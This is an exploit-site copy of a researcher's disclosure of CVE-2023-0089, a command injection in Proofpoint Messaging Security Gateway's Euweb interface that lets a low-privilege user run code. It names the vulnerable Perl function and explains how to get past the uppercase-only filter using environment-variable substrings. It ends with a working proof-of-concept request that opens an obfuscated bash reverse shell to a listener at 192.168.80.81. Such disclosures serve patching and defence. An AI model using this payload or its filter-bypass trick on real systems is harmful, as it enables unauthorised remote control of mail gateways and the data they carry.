## https://sploitus.com/exploit?id=PACKETSTORM:225274
# About
Security researcher: ly1g3, ly1g3[at]tuta.io
GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
Overview: Remote Code Execution - Low level authenticated user to admin RCE
CVE: CVE-2023-0089
Timeline:
* Discovered - ly1g3
* Reported - ly1g3
* Fixed - Proofpoint
# Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73
Exploits for Proofpoint Messaging Security Gateway
## Remote Code Execution (RCE)
A low level (authenticated) user of the Euweb can gain arbitrary code execution with admin privileges.
## Technical
The `getMsgType` function in the `Euwebutils.pm` is vulnerable to command injection. The `$module` variable comes from a get parameter and no sanitization is applied to this user input.
```perl
sub getMsgType {
...
else {
$msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module);
}
```
This `getMsgType` function is used by many API calls used by the Euweb application, so the exploit can be triggered in many ways.
Since all chars must be uppercase environment variables can be used to bypass this restriction for lower case letters. Example: `${SHELL:1:1}` instead of `b`
Since `use strict` is used `MAIL_GENERAL()` can be added to the beginning of the string to complete `PROOFPOINT_MAIL_REPORT_MSGTYPE_`. After this custom perl code can be added.
Example payload unencoded: ```MAIL_GENERAL();`id` ```
## POC
Reverse shell encoded using environment variables to bypass lower case restrictions. Code run as `pps` user.
```yaml
GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261`